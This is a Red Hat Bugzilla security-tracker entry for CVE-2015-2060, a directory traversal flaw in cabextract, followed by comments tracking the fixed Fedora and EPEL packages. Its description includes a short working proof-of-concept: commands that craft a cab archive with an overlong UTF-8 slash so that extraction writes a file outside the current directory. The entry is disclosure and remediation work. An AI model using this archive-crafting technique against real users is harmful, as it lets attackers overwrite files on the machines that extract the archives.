Bug 1193952 (CVE-2015-2060)

Summary: CVE-2015-2060 cabextract: directory traversal with UTF-8 symbols in filenames
Product: [Other] Security Response Reporter: Vasyl Kaigorodov <vkaigoro>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: janfrode, jorti, pertusus, rdieter
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2016-06-10 20:52:21 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1193955, 1193956    
Bug Blocks:    

Description Vasyl Kaigorodov 2015-02-18 15:42:37 UTC 
It was reported [1] that cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
  extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag.

The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

[1]: http://seclists.org/oss-sec/2015/q1/587
Comment 1 Vasyl Kaigorodov 2015-02-18 15:45:16 UTC 
Created cabextract tracking bugs for this issue:

Affects: fedora-all [bug 1193955]
Affects: epel-all [bug 1193956]
Comment 2 Fedora Update System 2015-03-09 08:21:42 UTC 
cabextract-1.5-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 3 Fedora Update System 2015-03-09 08:21:57 UTC 
cabextract-1.5-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 4 Fedora Update System 2015-03-16 16:31:51 UTC 
cabextract-1.5-1.el7 has been pushed to the Fedora EPEL 7 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 5 Fedora Update System 2015-03-16 16:32:16 UTC 
cabextract-1.5-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 6 Fedora Update System 2015-04-09 16:57:17 UTC 
cabextract-1.5-1.el5 has been pushed to the Fedora EPEL 5 stable repository.  If problems still persist, please make note of it in this bug report.